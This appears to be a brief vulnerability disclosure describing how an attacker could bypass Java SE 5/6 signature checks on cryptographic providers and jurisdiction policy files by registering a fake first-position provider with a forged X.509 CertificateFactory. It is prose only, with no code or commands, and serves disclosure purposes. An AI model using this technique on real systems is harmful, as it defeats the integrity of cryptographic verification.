An attacker can add a cryptographic provider containing cipher implementation signed by an untrusted certificate. The attacker can also create his or her own jurisdiction policy files signed by an untrusted certificate. In order to achieve this, the attacker must first of all add a fake cryptographic provider (with index 1) with special CertificateFactory.X.509 implementation. Such provider is not required to be signed. This implementation can return attacker's own untrusted certificate instead of one of the old JCE code signing certificates. This vulnerability is caused by using CertificateFactory#getInstance without specifying SUN provider in the code which is responsible for providers (and jurisdiction policy) signature verification. This applies to all versions of Java HotSpot SE 5 and 6. More details and code samples here: http://java.zacheusz.eu/provider-signature-verif-vuln-2/273/ Regards, Zacheusz Siedlecki